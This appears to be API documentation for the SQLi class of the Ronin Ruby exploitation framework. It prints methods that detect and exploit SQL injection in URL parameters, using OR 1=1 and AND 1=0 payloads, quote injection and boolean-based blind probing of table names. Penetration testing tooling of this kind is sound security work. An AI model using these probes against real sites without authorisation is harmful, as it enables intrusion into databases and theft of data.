Class: Ronin::Exploits::SQLi

Inherits:
Web show all
Defined in:
lib/ronin/exploits/sqli.rb

Constant Summary collapse

SPACES =

Different types of white-space to use

{
  nil      => ' ',
  tab:     "\t",
  newline: "\n",
  comment: '/**/'
}

Constants inherited from HTTP

HTTP::DEFAULT_PORT

Instance Attribute Summary

Attributes inherited from Exploit

#encoders, #helpers, #raw_payload, #restricted_chars, #target

Attributes included from Payloads::HasPayload

#payload

Instance Method Summary collapse

Methods inherited from Web

#exploit, #http_request, #normal_body, #normal_response, test, #url, #url_query_param_value

Methods inherited from HTTP

#url_for

Methods inherited from RemoteTCP

#deploy!, #test!

Methods included from Model::HasDefaultPort

included

Methods inherited from Exploit

#advisory, advisory, #arch, #build!, #build_payload!, #deploy!, #encode_payload, #encode_payload!, #evacuate!, #exploit!, #helper, #initialize, #os, #payload=, #restrict, #software, #targeting, #targeting_arch, targeting_arch, #targeting_os, targeting_os, #targeting_software, targeting_software, #use_target!

Methods included from Tests

#is_restricted?, #test_arch!, #test_os!, #test_restricted!, #test_software!, #test_target!

Methods included from PostExploitation::Mixin

#fs, #post_exploitation, #process, #resources, #shell

Methods included from Payloads::HasPayload

#default_payload, #initialize, #method_missing, #payload_class, #respond_to?, #use_payload!, #use_payload_from!

Constructor Details

This class inherits a constructor from Ronin::Exploits::Exploit

Dynamic Method Handling

This class handles dynamic methods through the method_missing method in the class Ronin::Payloads::HasPayload

Instance Method Details

#db_has_table?(name) ⇒ Boolean

Determines if a table exists in the Database.


179
180
181
182
183
# File 'lib/ronin/exploits/sqli.rb', line 179

def db_has_table?(name)
  sql = sqli.and { |sql| sql.select(sql.count).from(name) == 1 }

  !(normal_response.content_length < exploit(sql).content_length)
end

#exploit_url(sql, query_params = {}) ⇒ URI::HTTP

Creates an exploit URL which inject the SQL.


107
108
109
110
111
112
113
114
115
116
117
118
# File 'lib/ronin/exploits/sqli.rb', line 107

def exploit_url(sql,query_params={})
  sql = if sql.respond_to?(:to_sql)
          sql.to_sql(
            space:     SPACES[self.space],
            terminate: self.terminate?
          )
        else
          sql.to_s
        end

  return super(sql,query_params)
end

#place_holderInteger, ...

The place-holder value to insert just before the injected SQL.


64
65
66
67
68
69
70
71
72
73
74
75
76
77
# File 'lib/ronin/exploits/sqli.rb', line 64

def place_holder
  @place_holder ||= case self.escape.to_sym
                    when :integer then url_query_param_value.to_i
                    when :decimal then url_query_param_value.to_f
                    when :string  then url_query_param_value.to_s
                    when :list
                      case url_query_param_value
                      when /^\d+$/      then [url_query_param_value.to_i]
                      when /^\d*\.\d+$/ then [url_query_param_value.to_f]
                      else                   [url_query_param_value.to_s]
                      end
                    when :column  then url_query_param_value.to_sym
                    end
end

#sqli(&block) ⇒ SQL::Injection

Creates a new SQL injection.


87
88
89
90
91
92
93
# File 'lib/ronin/exploits/sqli.rb', line 87

def sqli(&block)
  SQL::Injection.new(
    escape:       self.escape.to_sym,
    place_holder: place_holder,
    &block
  )
end

#test_and_falseBoolean

Tests for SQL injection by appending AND 1=0.


136
137
138
139
140
# File 'lib/ronin/exploits/sqli.rb', line 136

def test_and_false
  sql = sqli.and { 1 == 0 }

  normal_response.content_length > exploit(sql).content_length
end

#test_or_trueBoolean

Tests for SQL injection by appending OR 1=1.


148
149
150
151
152
# File 'lib/ronin/exploits/sqli.rb', line 148

def test_or_true
  sql = sqli.or { 1 == 1 }

  normal_response.content_length < exploit(sql).content_length
end

#test_quotesBoolean

Tests for SQL injection by appending tick marks (', ", \`).


126
127
128
# File 'lib/ronin/exploits/sqli.rb', line 126

def test_quotes
  %w[' " `].any? { |quote| exploit(quote).code == '500' }
end

#vulnerable?Boolean

Tests whether the URL is vulnerable to SQL injection.


164
165
166
167
168
# File 'lib/ronin/exploits/sqli.rb', line 164

def vulnerable?
  test_or_true    ||
  test_and_false  ||
  test_quotes
end